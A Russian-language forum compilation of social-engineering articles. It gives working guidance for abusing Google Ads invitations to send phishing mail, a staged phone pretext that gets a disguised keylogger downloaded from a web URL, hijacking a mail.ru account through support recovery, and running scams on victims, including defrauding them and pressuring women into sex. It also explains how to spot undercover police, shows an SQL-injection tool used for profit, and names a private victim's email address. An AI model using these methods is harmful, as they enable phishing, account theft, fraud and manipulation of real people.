. . . . . . . . . . . . . . . . . . . . Для получения расширенной статистики по аккаунту такому-то подтвердите свое участие в Beta-тестировании: www.bad-ad-google.com
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog1.png&hash=5203923ac2bb26d4de4ff336ff286929)
Указываем название аккаунта
Идем сюда: https://ads.google.com/aw/accountaccess/users — и пишем email
получателя.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog2.png&hash=fc56c4f3a59feb4c8b0555c87b28ccc3)
Выбираем уровень доступа
Пользователю придет письмо от имени [ads-noreply@google.com](mailto:ads-
noreply@google.com).
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fgoog3.png&hash=4dd1b8d7bcb6367a46da412ca21d8365)
Пример сообщения от ads-noreply@google.com
Дальше следует фишинговая форма авторизации, загрузка эксплоита и тому подобное.
Click to expand...
В Google сказали: хоть социальная инженерия и зло, мы не уберем возможность отправки таких сообщений. Просто подкрутим, чтобы через эту форму было сложнее отправлять спам. Социальному инженеру этого достаточно, он ведь не спамер.
Бонус
Напоследок приведу несколько лайфхаков.
Вместо выводов
О технических средствах защиты от социальной инженерии ты наверняка знаешь
лучше меня. К сожалению, их недостаточно. Как говорил основатель Group-IB Илья
Сачков: «…какие бы ни были технологии… все становится бессмысленно, если
сотрудники открывают подозрительные файлы и кликают на фишинговые ссылки… и у
всех везде одинаковые пароли».
авторство (c) SEBLOG
Собраны самые сливки всего того, о чем Митник говорит на своих консультациях по информационной безопасности. Кроме того, в качестве бонуса в этом разделе приведен иллюстрированный классификатор фишинговых атак.
Ареал основных видов сетевого мошенничества
Вводные замечания от Кевина Митника
Тема кибербезопасности сегодня весьма злободневна. Существует множество
высокотехнологичных решений, призванных защищать корпоративные информационные
системы. Однако, как мы знаем, самое слабое звено любой информационной системы
– это ее пользователи, которые, став жертвой злоумышленника, сами того не
подозревая, отдают ему ключи от сокровищницы. Лично я знаю это не понаслышке,
поскольку сам был хакером. Я открыл для себя, насколько легко обмануть
сотрудников, чтобы убедить их отдать мне любую конфиденциальную информацию об
их компании: имена пользователей, пароли, номера учетных записей и коды
удаленного доступа. И насколько легко использовать эту информацию для взлома
самого сердца их сетей. Моя ловкость в этом вопросе сыграла со мной злую
шутку, и мне пришлось отсидеть пять лет в федеральной тюрьме. Однако, выйдя в
2000-м из тюрьмы, я стал консультировать бизнесменов и правительство по
вопросам кибербезопасности. В этой статье я представлю все то, о чем говорю на
своих консультациях.
Зловещее искусство убеждения
Самое большое заблуждение в кибербезопасности – это то, что самый опасный
инструмент хакера – это компьютер. Вовсе нет. Самый опасный инструмент хакера
– это телефон. По мере совершенствования технологий кибербезопасности
злоумышленники все чаще прибегают к «старой школе».
Зачем бороться с непомерно защищенным корпоративным файрволом, когда можно обмануть служащего?
Click to expand...
Служащего, который снимет трубку и скажет пароль своего босса. Злоумышленники, прокладывающие путь в «защищенные» корпоративные системы, умеют манипулировать естественными человеческими склонностями. Вот почему я называю их социальными инженерами.
Основа для создания защиты от атак социальных инженеров –ясное понимание того, как именно происходит процесс убеждения. Социальная инженерия опирается на несколько фундаментальных аспектов человеческой природы: желание быть хорошим, склонность отвечать взаимностью, склонность следовать за большинством, склонность исполнять негласные публичные обязательства, склонность гнаться за дефицитными вещами и склонность доверять авторитету. Кроме того, большинство людей самопроизвольно доверяют тому, что им говорят другие, редко подвергая сказанное сомнению. Совокупность этих аспектов человеческой природы представляет собой рабочий арсенал социального инженера. Основа для создания защиты от атак социальных инженеров – ясное понимание того, как именно происходит процесс убеждения. Расскажу об этом ниже.
Но сначала рассмотрим гипотетический случай работы социального инженера, который устанавливает кейлоггер на компьютер директора компании.
Click to expand...
Этот случай смоделирован на основе реальных событий.
В отделе кадров крупного издательства Москвы звонит телефон:
– Отдел кадров, Елена.
– Привет, Лен. Это Сергей с автостоянки. У нас возникли проблемы с картами доступа на парковке: недавно устроившиеся к нам сотрудники жалуются, что карты не работают. Поэтому нам надо перепрограммировать карты новых сотрудников, которые устроились на работу в течение последних 30 дней. Как мне узнать всех новичков?
– Я могу проверить наш список новичков и перезвонить вам. Какой у вас телефон?
– Отлично! Но я сейчас убегаю. Может, я сам перезвоню где-нибудь через полчаса?
– Хорошо.
Когда «Сергей» звонит Елене вновь, та передает ему имена и номера двух новых сотрудников. И она без каких-либо подозрений говорит, что один из них вице- президент, а другой, Евгений Михайлович, помощник по финансам. Бинго! Следующий звонок «Сергея» – около шести вечера – Евгению:
– Финансы. Евгений на проводе.
– Очень рад, что кто-то работает допоздна. Послушай, это Владимир Иванов. Я вице-президент книжного отдела. Нас не успели представить друг другу. Добро пожаловать в нашу компанию.
– Ой, спасибо.
– Евгений, я на конференции в Питере, и у меня форс-мажор. Знаю, что у тебя своих дел хватает, но помоги, пожалуйста. А я тебе персональную экскурсию по отделам устрою.
– Конечно. Чем могу помочь?
– Сходи в мой офис. Мне нужна рукопись. Ты знаешь, где мой офис?
– Нет.
– Это угловой офис на 15-м этаже, комната 1502. Я перезвоню тебе туда через несколько минут. Когда попадешь в офис, нажми кнопку переадресации вызова на телефоне, чтобы мой звонок не был переадресован на мою голосовую почту.
– Хорошо. Уже иду.
Десять минут спустя Евгений уже в офисе Владимира Иванова. Он отключил переадресацию вызовов Владимира и ждет телефонного звонка. Наш социальный инженер, представившийся Владимиром, просит его запустить Internet Explorer на компьютере Владимира, напечатать «www.geocities.com/ron_vitarro/manuscript.exe» и нажать «ENTER». Появляется диалоговое окно, и наш социальный инженер просит Евгения нажать «ОТКРЫТЬ», вместо «СОХРАНИТЬ». Компьютер начинает загружать рукопись, но затем экран гаснет. Когда Евгений сообщает, что что-то идет не так, социальный инженер подыгрывает:
– О нет. Неужели опять. У меня уже были проблемы с загрузкой с этого сайта, но я думал, что ошибку исправили. Ну да ладно. Не волнуйся. Я попозже найду другой способ получить этот файл.
Затем социальный инженер просит Евгения перезагрузить компьютер: чтобы «Владимир» мог убедиться, что компьютер работает нормально. Пока компьютер перезагружается, «Владимир» дружелюбно болтает с Евгением. Когда компьютер снова загружается и начинает работать правильно, «Владимир» сердечно благодарит Евгения и вешает трубку. Евгений возвращается к своему рабочему столу, довольный тем, что наладил хороший контакт с вице-президентом.
Конечно же, Евгений не знает, что его обманул ловкий социальный инженер и он только что помог хакеру установить шпионскую программу на компьютер вице- президента. Установленная программа будет записывать все нажимаемые Ивановым клавиши. В том числе электронную почту, пароли, посещаемые веб-сайты. А также делать скриншоты и отправлять все это богатство по электронной почте на анонимный бесплатный почтовый ящик хакера из Чукотки.
Как и большинство подобных нарушений, такие действия требуют лишь минимальных технических навыков (маскировка шпионской программы под рукопись) и небольшой предварительной подготовки. Хакеру надо было предварительно получить некоторую информацию: офис Иванова, время его ухода и т.д. Однако подобного рода детали легко собираются при помощи тактики наподобие той, что была использована для получения списка новых сотрудников.
Используя подобные методы, социальные инженеры могут:
(c) SEBLOG
Привет, друг! Как ты знаешь, любая работа накладывает свой отпечаток на человека. Сотрудники МВД вынуждены контактировать с разными личностями, хорошими и плохими, и сама специфика работы тяготеет к озлоблению, поэтому сотрудник МВД, часто общается немного грубее. В этой статье, я расскажу тебе как распознать сотрудника спецслужб под прикрытием.
Как я упомянул выше, я писал что сотрудник МВД часто общается немного грубее и
нетерпимее к контраргументам, чем представитель другого клана трудящихся, хотя
он может никакого негатива и не подразумевать под своими словами.
Привычка. Точно так же, как педагог со стажем способен долго и терпеливо
тебя выслушивать, но все его ответные фразы будут иметь наставительный
оттенок, а врача вряд ли разжалобят радикулитные стоны и причитания, и он
непременно посоветует что-нибудь из средств, но сделает это радостно улыбаясь,
в духе доктора Ливси, а через
десять минут после окончания диалога, тут же выбросит его из головы.
Ты вообще замечал, что мента, комитетчика, прокурорского можно сразу узнать в
толпе, даже если он будет искусно маскироваться. Дешёвые прически, дешёвые
шмотки, обязательно папочка в руках или барсетка, никаких жвачек,
растительности на лице, цепляющийся взгляд и напряжённость во всем.
Большинство сотрудников МВД очень типичны. Обычно хватает 2–3 секунд для
того, чтобы понять , что перед тобой мент. Механизм этого определения у
опытного человека отлажен, идентификация происходит автоматически. Непонятно,
то ли это некий инстинкт, то ли это работа подсознания, но факты таковы, что
мента видно даже в огромной толпе. Приведем характерные факты, по которым
можно понять, что перед вами сотрудник полиции:
Возраст
На вид: 22–35 лет. Те, кто младше — ещё не работают операми, а кто старше —
уже не работают.
Черты лица
Черты лица грубые, строгие, и в очень редких случаях среди них встречаются
привлекательные крАСАВчики. Лицо часто асcиметричное, челюсти будто в
постоянном напряжении. Форма лица либо строго прямоугольная (“кирпич”), либо
круглая. Эталонный пример — это лицо типичного красноармейца времён
гражданской войны.
Мимика
Самое примечательное в менте — это взгляд. Он всегда строгий и
целеустремлённый, примерно как у сторожевого пса. Глаза никогда не бегают,
если он и переводит взгляд, то очень плавно. Его глаза будто говорят: «Я на
тебя смотреть не боюсь, просто нужно посмотреть куда-то ещё, но я обязательно
вернусь к тебе”. Мент очень долго может смотреть на тебя, как бы изучая, время
от времени переключаясь на другие предметы, но всегда в его взгляде читается
некая подозрительность и глубокая заинтересованность тобой, будто у него
задание вычислить преступника по внешнему виду.
Очень интересная штука открылась мне, когда я долго находился в отделе. Мимо
меня успело пройти около сотни разномастных мусоров. Все, от сержанта до
полковника смотрели на меня по такой схеме: лицо-пояс-обувь. На этот просмотр
уходило не более 2 секунд, при этом взгляд был не плавно опускающимся, а
скорее напоминал 3 быстрых выстрела. Сотрудник полиции всегда старается
держать очень серьёзный и опасный вид, на публике никогда не даёт своему лицу
расслабиться, улыбнуться или принять задумчивый вид. Губы старается держать,
таким образом, будто из них вот-вот вырвется оскорбление.
Одежда
В шмотках мусоров в штатском кроется слабость. Дресскод МВД заставляет
одеваться всех сотрудников приблизительно одинаково, причём настолько, что
скиновский прикид “на палеве” не идёт ни в какое сравнение. Типичная униформа
опера в штатском: головной убор отсутствует, прическа короткая, на теле зимой
чёрная куртка, летом поло или рубашка, на ногах исключительно джинсы и чёрные
ботинки, через плечо чёрная небольшая прямоугольная сумка. Увидишь такого, а
чаще всего таких (опера обычно работают в паре), будь уверен — перед вами
мусор с вероятностью 99,9%.
Менты любят носить короткие куртки, до пояса. Чаще всего кожаные. Если к тебе
подошёл здоровенный мужик в пуховике — вряд ли это мент. Длинная, ниже пояса
кожаная куртка — редкая вещь у ментов, ну а насчёт кожаного пальто вы и так
знаете — это либо мент, либо вор.
Поведение
Поведение опера можно описать ёмкой фразой: не пришей рукав. Если опера на
задании, то они бесцельно ходят по небольшому участку местности спокойным
прогулочным шагом, время от времени вглядываясь в прохожих и останавливаясь
немного поговорить с ППСниками. На политических акциях плакаты не держат,
лозунгов не кричат, держатся обособленно от толпы, часто сбиваются в группы.
При таком подходе к конспирации: форму вообще было необязательно снимать.
Бывало, что менты за пару месяцев своей работы так вживаются в роль, что она
становится их второй натурой, поэтому в таком виде начинают ходить постоянно
не только перед начальством, но и перед гражданским населением, в связи с чем
резко выделяются в толпе и распознать их не составляет большого труда.
И, самое главное, пожалуй: мент чрезвычайно разговорчив. Если через три
минуты общения ты уже рассказываешь незнакомцу про своего прадеда, который
прошел Великую Отечественную, или об арендной плате за коммуналку, которая
постоянно растёт, вместо того, чтобы передать ему вещь, получить плату и
расстаться — перед тобой мент с вероятностью в 95 %. Ты уже практически
попал, но тут есть ещё шанс как-то выкрутиться, попытаться свинтить “на
похороны любимой тётушки”, но лучше в разговоры не по теме не вступать. Помни
одно: всякий разговор имеет цель. Если ты заметил, что разговор зашел на пол-
сантиметра левее конкретной цели, с которой изначально подошёл к тебе человек
— тебе подводят наживку. Срывайся. Это — главное правило.
Пожалуй, я описал тебе все внешние признаки. Самое интересное в том, что
подобные признаки существуют не первый год, и за это время руководству МВД и
ФСБ даже не пришло в голову маскировать агентов.
А для соратников только хорошие новости: пока система работает так топорно —
мы имеем небольшое преимущество.
Большинство статей о социальной инженерии описывают какой-то конкретный случай из сомнительной практики. Здесь же мы попытаемся разложить все по полочкам и ответить на существенные вопросы: как работает мозг при принятии решения, как повлиять на это решение и какие процессы могут автоматизировать процесс?
Как формируется принятие решения?
Стопроцентного ответа на нынешний день не существует, однако проводимые исследования говорят нам о том, что фактически за выбор того или иного решения ответственен стриатум (чтобы не усложнять - часть головного мозга). Помимо принятия решения, "это" так же запускает определенную модель поведения (для достижения результата).
При этом, не смотря на его дробление на три части, они все вместе принимают единное участие в принятие общего решения в различные временные промежутки. Т.е. части взаимодействуют между собой, а не действуют независимо друг от друга. В этот момент происходит то, что обычно мы называем анализом ситуации. Индивидум анализирует, какое решение следует принять, исходя из двух факторов: жизненный опыт (рациональная половина) и эмоции (желания, инстинкты).
Опыт или желание? Формирование приоритетов при принятии решения
Не стоит расценивать процесс анализа, как противостояние рационального и эмоций. И хотя имеет место быть, в некоторых случаях внешне кажется, что именно это и происходит (например, покупка дорогой электроники человеком, которому это явно не по карману, но ему хочется поднять свой статус в глазах остальных людей). Этот процесс можно рассматривать, как генерацию определенного количества «за» и «против» с обеих сторон. И вот здесь следует подробно остановиться на том, определить причины возникновения «за» и «против». Наверняка многие из вас знают про пирамиду потребностей Маслоу.
Отталкиваясь от этой пирамиды, можно увидеть, что в некоторых случаях решение определяется потребностями человека. Например, попытка убедить человека заплатить огромную сумму за дешевый товар не имеет смысла, если у человека за душой ни гроша.
С другой стороны, пирамида Маслоу была бы идеальной моделью поведения человека, если бы он принимал решения только исходя из своих потребностей. Но, факт остается фактом, человек далеко не всегда (практически никогда) принимает решение осознанно . Весомую роль играют инстинкты и эмоции. Так, например, тот же человек может взять кредит в банке, лишь бы заполучить ваш товар (инстинкт доминирования над остальными индивидами). Либо он может просто дать вам денег, при наличие сильной эмоции, принуждающей его сделать это. Например, жалость.
К сожалению, как правило воздействовать на рациональную часть не получится (если это не ложь либо на связку воздействия еще на что-то). Наиболее интересные способы взаимодействия предполагают давление именно либо на эмоции, либо на животную сущность человека.
Существует одно интересное исследование, суть которого заключается в том, что индивид испытывает удовольствие не только в момент получения награды, но и на пути к ее достижению. И здесь уместно вспомнить о различных историях промывки мозгов на тему финансовых пирамид, отказов от нажитого имущества в пользу в своей духовности и т. д. Давайте более подробно рассмотрим эту ситуацию (промывку мозгов каким-нибудь сектантом).
Человека убедили в том, что ему это нужно, воздействуя, как правило, на эмоции. Рассказали как все плохо сейчас, в его нынешней ситуации, «раскрыли глаза». Особый вес такая промывка получает, если подкрепить ее какими-либо псевдофактами, либо высказываниями авторитетных людей (ученых, мыслителей и т. д.). Дело в том, что человек существо социальное, а для социума наличие лидера, к словам которого прислушиваются — нормальное явление. Эти связи образовались в нашем сознании очень давно и помогали выживать: лидер брал на себя ответственность, распределял ресурсы между социумом для более продуктивной работы.
Соответственно, к мнению лидера прислушивались. Механизм схож по своей структуре с работой цифровых сертификатов — все основано на доверии. И вот человек слушает это все, «трастовость» лапши начинает превышать его собственный опыт, давление на эмоции оказано (его самооценка упала, ведь все что он делал оказывается «неправильно»), и его мнение меняется. Несмотря на казалось бы логичную вещь: отдавая материальные ценности он фактически подвергает дополнительной опасности себя самого. Почему это происходит?
На фоне эмоционального давления на человека, ему внушают новые цели (у него сейчас все плохо, но ведь все можно изменить). И в этот момент мозг начинает стимулировать организм на достижение этих целей. Вырабатывается специальный гормон: дофамин, который как раз и отвечает за так называемую «мотивацию». Определенный показатель того, какие усилия может приложить человек для достижения целей (в данном случае навязанных). В итоге получается, вопреки логике, человек оказывается на улице ради какой-то высшей цели, и при этом он только рад своей «свободе от материального», несмотря на прямой вред своему организму (физиологическим потребностям по пирамиде Маслоу).
Влияние на решение извне
А теперь поговорим о том, какие можно сделать выводы из истории выше. В первую очередь, воздействие на рациональную часть мозга почти всегда бессмысленное занятие. К примеру, если вы попытаетесь убедить человека вкладывать деньги в вашу криптовалюту, вам вряд ли удастся убедить его только цифрами. Во-первых, мозг человека всегда предпочтет награду «здесь и сейчас» каким-то сомнительным перспективам. В данном случае «здесь и сейчас» – это его капитал. А сомнительным потому, что уровень доверия к вам у человека недостаточно высокий.
Но, достаточно привести пример успешных вложений, рассказать о том, какие это перспективные технологии, и что вообще будущее за криптовалютами, человек начинает сразу рисовать в голове красочную картинку о потенциальной прибыли (ведь успешные примеры уже были), дополняя ее различными эмоциями. В этом случае чувство ожидания будет только дополнительно стимулировать человека.
Далее, есть несколько интересных приемов, основанных опять же на социальной
составляющей сознания:
При оказании какой-либо услуги человеку, он более охотно идет на контакт,
возникает чувство долга (оно не будет ярко выражено, разумеется, но и
отношение к вам сместится вверх с нулевой отметки).
Просьба оказать помощь (пускай и незначительную) этому способствует. Человек
неосознанно ставит себя выше того, кому он оказывал помощь (ведь у него
попросили). К тому же удовлетворяется потребность в признании, растет
самооценка. Это явление называют эффект Бенджамина Франклина.
Точечная обработка занимает больше времени, чем обход по базе. Т.е. читатель
должен понимать, что добиться желаемого от конкретного человека — занятие
небыстрое. Это особенно знакомо тем, кто имел дело с промышленным шпионажем. С
другой стороны, если читатель берет количеством, то % выхлопа небольшой, но он
будет ощутимо быстрее получен. Однако, каждый из методов имеет право на
существование.
Умейте слушать. Это особенно актуально при общении с одним человеком. Зачастую
нежелание/неумение понимать собеседника — главная ошибка. В случае работы с
большой группой людей необходимо понимать ее потребности, интересы и т. д.
(общие признаки, по которым люди были объединены в группу). В конце концов,
все так или иначе люди, с базовым набором физиологических потребностей.
Не пытайтесь давить на рациональную часть и эмоции, если для какой-то попытки
с обоих сторон вернулся минус. Поясню. Человек хочет запустить определенную
модель поведения у другого человека. При этом, если и логика и эмоции против
этого, то лучше сразу отступить и пробовать по-другому, шанс усугубить
ситуацию стремительно возрастает.
Выходите за рамки ожидаемой модели поведения. При взаимодействии с любым
объектом, с которым был опыт взаимодействия ранее в мозгу формируется
ожидаемая модель поведения. Выход за рамки этого шаблона вводит в ступор
рациональную часть, легче становится воздействовать на эмоции. Но все хорошо в
меру, т. к. ко всему новому любое живое существо всегда относится с
осторожностью (срабатывает инстинкт самосохранения).
Собирайте как можно больше информации о человеке прежде чем предпринимать
какие-либо действия. Здесь следует особое внимание обратить на то, что
действовать (неважно напрямую или нет) нужно только тогда, когда будет
уверенность в том, что собрать больше информации не выйдет, и она вся
проанализирована и структурирована.
Использование технических средств при влиянии на решение
Самое главное средство, которое можно использовать, собственный интеллект. Не смотря на попытки описать модель поведения человека в различных ситуациях до сих пор не создано более близкого решения, чем, собственно, человеческий мозг. Большинство компьютерных моделей направлены в какую-то узкую сферу с шаблонным поведением. А вот мозг способен абстрагироваться от чего-то конкретного, да и по скорости интерпретации и усваивания новой информации нет средства более быстрого.
Что касается сугубо технических средств, то это, конечно же, поисковые системы
и социальные сети. Об этом уже много раз упоминалось в различных материалах.
Люди делятся информацией о себе для различных целей (самоидентификация в
обществе, коммерческие интересы и т. д.). Все это можно использовать как
минимум для сбора информации, как максимум — манипуляции. Также:
Не забывайте просматривать метаданные файлов. В них может быть очень много
интересной информации.
Некоторые страницы могут быть недоступны, но вебархив, как правило, все
помнит;
Пользуйтесь, наконец, парсерами. Практически любой объем информации можно
получить и проанализировать благодаря любому языку программирования и врапперу
для curl под этот язык. Также не забываем, что любой социальный сервис
предоставляет собственный API для удобства;
Компрометация мобильного устройства человека — практически 100% вариант
получения доступа ко всей частной информации.
Следите за исследованиями и открытиями. Психология это хорошо, но она только
выявляет закономерность, а не объясняет явление.
Еще есть must read книга по отчасти по этой теме “Думай медленно… решай быстро” Д. Канеман этот человек на протяженни 40 лет занимался анализом образа мышления и поведенческой психологией людей – грандиозный труд.
Ведь есть 2 основных подхода этой области, это когда с физиологической точки зрения проблему изучают (какие участки коры активизируются в тот или иной момент и пр) и с абстрактной – как мозг реагирует на такое-то явление (кстати аналогия с тестированием методом черного ящика и анализом кода).
Вот эта книга второй момент и освещает.
Автор описывает, в какие моменты наш мозг “дает слабину” и мы принимает неправильные или нерациональные решения (необязательно за счет поддавания эмоциям) и все эти примеры можно только запомнить, как факт и использовать в каких-либо целях (не давать себя обдурить или тщательно продумывать умозаключения, ну или использовать это против других).
Это на подобии когда наш мозг воспринимает оптическую иллюзию не такой, как на самом деле, пусть даже нам раскроют тайну, что это лишь иллюзия, мы все равно будем видеть то, что видим
Приведу пример:
В книге описывается так называемый эффект привязки, когда мы несознательно в свои анализ, умозаключения и выводы включаем недавно поступившие данные.
Например, если мы подойдем к человеку и спросим как долго мне идти до такой-то улицы, то услышим относительно точный ответ, пусть это будет 40 минут, (при условии, что он это знает и никто недавно к нему не подходил), если же мы спросим “могу я дойти до этой улицы за 10 минут?”, то в ответ нам выдаст цифру довольно близкую к нашей и значительно менее точную в реальности (типа “вы дойдете минут за 20-30”).
Я после прочтения книги и сам стал обращать внимание на подобные вещи в реале, часто даже специально, когда с кем-то общался употреблял какое-то не бытовое слово или термин, который потом проскакивал в речи моего собеседника (он как бы не сознательно перенимал мой лексикон, то есть ту информацию, которую я подавал ему, когда выражал свои мысли).
Это лишь один из десятков моментов, которые описываются в книге и которые можно юзать и в соц. инженерии при попытке воздействия на какого-то конкретного человека.
КОПИПАСТ
Обувь
Ботинки порядком поношенные? Грязные? Может, это вообще рабочие ботинки? Обувь дорогая?
Если вы не сильны в ценах, просто задержитесь в обувном отделе, когда в следующий раз пойдете за покупками. Учитесь различать обувь по материалу и фасону, а после сравните туфли из магазина распродаж с похожими из бутика. Потратьте какое-то время на изучение символики дорогих дизайнеров и марок.
Однажды в обувном магазине приятная девушка-консультант сказала, что на мне прекрасно смотрелись бы легкие кожаные мокасины от «Гуччи». Я примерил их — они и впрямь оказались великолепными. Но потом я нашел ценник. Почти 500 долларов. Ничего себе! Что ж, могу поспорить, я никогда не забуду эти мокасины. Позже я увидел их на одном джентльмене в зале и, конечно, пригласил его на сцену. Я знал: тот, кто покупает такую обувь, отлично чувствует себя в центре внимания и даже ищет способ привлечь к себе взгляды окружающих. Кроме того, мне сразу стал ясен его финансовый статус.
Вы должны всесторонне исследовать человека, стоящего перед вами
Посмотрите на его руки. На них есть мозоли? Возможно, этот человек работает
руками или регулярно занимается с гантелями. Если он не в самой лучшей
физической форме, гантели можно исключить.
А что насчет его ногтей? Лично я ненавижу свою привычку грызть ногти. Я слишком хорошо знаю, что это признак нервозности. Кроме того, часто такая привычка указывает на то, что человек несерьезно воспринимает происходящее в своей жизни. Я обычно оставляю свои ногти в покое, когда нахожусь в «хорошем месте», расслабленный, спокойный и сфокусированный.
Цвет кожи — тоже хороший индикатор. В первую очередь оттенок кожи говорит о корнях и национальности. Еще кожа выдает «поклонников солнца». Тот, кто проводит бесчисленные часы на солнце, обычно становится не только обладателем загара, но и лучистых морщинок в уголках глаз. А значит, ваш объект либо работает на открытом воздухе, либо из тех, у которого «все есть» и он может позволить себе неделями валяться на пляже. Или этот загар больше похож на результат трудов человека, чем солнца? Люди, пользующиеся автозагаром, всегда очень озабочены своим внешним видом.
Если женщина носит что-то очень броское , вроде маленьких облегающих шортиков или кричащей надписи на футболке, то она либо артистическая, творческая натура, либо слегка отстала от моды. Блузы с глубокими вырезами и короткие шортики обычно говорят о том, что женщине комфортно в своем теле. А если на женщине колготки, то она либо стремится к строгому корпоративному стилю, либо стесняется показывать свои ноги.
Определить, правша человек или левша можно по тому, как он пристегивается, завязывает галстук, носит часы, или просто приглядевшись к его жестам.
Отдельный предмет может рассказать нам немало интересного, но вся основная информация о человеке в нем самом.
Как определить возраст человека?
Зрение. Если есть такая возможность, попросите собеседника что-либо
прочесть. Как правило, молодежь (до 20 лет) держит текст на расстоянии около
10 см от глаз, в то время как более взрослые люди (25—30 лет) увеличивают это
расстояние примерно на 50 %, а после 30 — еще в два раза.
Любимые места. Как правило, с возрастом меняются наши предпочтения относительно досуга. Если в 18 лет мы любим бывать в клубах, то к 23—25 годам отдаём предпочтение кинотеатрам, а к 28 — театрам и музеям. Однако это лишь общая статистика.
Пересекающиеся вопросы. Пожалуй, самый точный способ определения возраста, если у Вас есть возможность не просто визуально оценить человека, но и побеседовать с ним. Задайте несколько вопросов, и путём несложных математических подсчётов ответ будет найден. Например, спросите у собеседника, в каком возрасте йога стала его главным увлечением, а спустя некоторое время поинтересуйтесь, сколько лет он уже занимается данным направлением. Просуммировав полученные числа, Вы определите возраст человека.
Возрастные пятна — руки постоянно подвержены контакту с самыми разными элементами, в следствии чего возникают возрастные отметки на коже, вроде веснушек и выцветших пятнышек. Чем их больше, тем человек старше.
Полупрозрачная кожа — кожа человека с годами становится тоньше, но в коже рук изначально не было много жира. Без специальной накачки, возможной в клиниках красоты, кожа рук становится полупрозрачной.
Морщины на коже — самый очевидный признак старения.
Обвисшая кожа — без достаточного количества здоровой ткани, необходимой для поддержки, тонкая кожа с годами начинает провисать.
Выступающие вены — с годами крупные вены с задней части рук становятся более видимыми, равно как сухожилия и кости.
Помните, всегда есть исключения и присутствует % погрешности.
Всем привет сегодня поговорим оСписоках сайтов лохотронов или Черный список да мы будем искать фейки в сети ,нам не нужен фейк или покупать домен за нас все это у же сделают
Но сегодня мы будем делать ещё хитрей,сегодня мне попался в Sqli Dumperhexonline.co.uk пиздеть Вам не буду давно знал что этот сайт фейк но сути нашей это не меняет как видим на скриншоте в летел комне реально в софт что лишний раз потвердило мои догодаки что всё почти фейки,что есть в сети имеют уязвимости остается только понят специально их делают или нет .
Не долго думаю пошел сюдатык где и видел данный сайт .
**Думаю мысль Вы мою уловили что профит можно иметь чисто на фейках в сети не тратя денег на хостингы и.т.д ну и как профит отписываемся в теме и ждем лохов **
профит
p**.sВсе ссылки мертвые так как фейк умер и этот америкоский говно борд кидал,видео просто демонстрация наши точно не один не пострадал да вот инструмент для ленивых phishing_catcher**
Всем привет посмотрите видео и перейдем к практике в бою
**
**
Приведу пример по чему меня на борде не было пару дней так вот занимался взломам почты в личных целях так вот фишинг не прокатил и вирусы, пошел другим путем, восстановление доступа через службу поддержки и меня ждал приятный сюрприз,вот почта терпилы~~epervushin1944@inbox.ru**~~ **
Напрашивается вопрос да ну и хули тут умного, объясняю мы узнали возможно первый пароль терпилы
дальше смотрим создания топа
**переходим в мой мир xrahitel **
все есть дата захода последния,что мы имеем пароль первый 99% дату создания ящика и когда заходил последний раз в ящик.
Пару советов напоследок перед взломом надо дней за пять, по переписываться с терпилом по х... о чем
максимум три дня придет ссылка
Да данная ссылка действует три дня за это время можно продать свой акк а потом вернуть назад но об этому расскажу в другой раз кто не понял а мы продолжаем так дальше будет ещё интересней.
угон через службу поддержки
В продолжения темы вышеи так прочитали на дворе 2018 не х.. не изменилось надопервый пароль при регистрации акка и иногда просят второй ящик как его найти не буду тут описывать всё это есть на борде погнали переходим именно сюда [help.mail.ru](https://help.mail.ru/mail- help/registration/login/nopassremind)
**Мой ответ девочке хочу обратить внимания что такое произошло только и за того что дал не первый пароль который был при реги акка по этому потребовали его и почту,да если почта не была привязана то естественно её и не требует раньше так восстанавливал давал сразу первый пароль и все через сутки в ящике **
**Как найти первый пароль от ящика читайте первую часть статьи,что-бы не ждать час не забываем отблагодарить службу поддержки **
Данный факт играет не малую роль в таких делах как СИ пишите там что сервис просто мега какой ебнутый
p.** s почту угонял у близкого во второй части в первой было в бою и он до последнего не верил что это возможно зная только первый пароль от ящика кстати теперь то-же его знаю![](/proxy.php?image=http%3A%2F%2Fwww.prikolnianekdot.ru%2Fweb%2Fsmile- anim-2%2F36.gif&hash=379508576f58637b1530904d0b407585) но это у же другая история и уровень СИ. **
**
**
Начну пожалуй с того, что затрону самые азы. О самом понятии социальная инженерия (далее просто СИ) я узнал не сразу, хотя успешно применял некоторые её техники, которым я невольно обучился в "особые" периоды своей жизни. В данной статье не будет каких-то практических рекомендаций, которые будут подходить абсолютно для всех ситуаций, каждая ситуация всегда остается уникальной и всё зависит от тех целей, которые вы преследуете.
Зачем нужная социальная инженерия и где она используется?
Социальная инженерия - это искусство управления человеческим сознанием, с помощью психологических техник можно добиться от человека необходимых для нас действий с его стороны. СИ используют не только для мошеннических действий но и повседневно применяют в сфере торговли. Этому ремеслу нельзя обучится прочитав несколько статей или книг, из них вы только узнаете как работает то или иное ваше действие и что могут означать действия вашего собеседника, реально освоить навыки СИ можно только путём постоянной практики!
Если вы хотите расположить к себе человека и имеете конкретную цель: кинуть на деньги, развести девушку на секс, получить доступ к приватной информаци и т.п.
Хочу привести в пример некоторые базовые правила, которые могут послужить хорошей основой для изучения СИ. Пытайтесь постоянно применять все новые получение знания на практике, со временем вы станете настоящим профессионалом, который тонко чувствует свою жертву!
Безопасность.
Никогда и не при каких обстоятельствах не раскрывайте свою настоящую личность. При этом абсолютно не важно, какие цели ты преследуешь за собой. Даже из-за самого недалёкого нуба у вас в последствии могут быть проблемы. После достижения необходимого результата следует полностью оборвать связи с жертвой, не вести никаких переписок и т.п.
Правописание.
Думаю, вы не удивитесь, если я вам скажу, что по тому, как пишет человек можно многое о нём узнать. Когда пишет школьник - это сразу становится понятным. Когда кто-то пишет капсом, у нас сразу возникает чувство, что этот человек определённо до***оеб. Не допускайте орфографических ошибок, это уже совсем просто!
Побудьте немного занятым.
Очень бросается в глаза, когда тебя откровенно хотят развести. Это видно по тому, что вы постоянно сидите в онлайне, пишите over 1kkk сообщений и отвечаете за долю секунды, вы сильно навязчивы. Создайте образ занятого человека, мол у вас сейчас есть дела и вы ответите чуточку позже, не нужно молниеносно реагировать на каждое сообщение, немного подождите. Пускай человек сам проявляет к вам интерес.
Общение, общение и еще раз общение.
Всегда поддерживайте ненавязчивый разговор со своей жертвой, говорите, что у вас была похожая ситуация и вы как добрый человек можете помочь ей в решении какой-то проблемы. Не нужно давить на человека, это необходимо только в особых случаях, но в большинстве ситуаций это лишнее.
© copyright
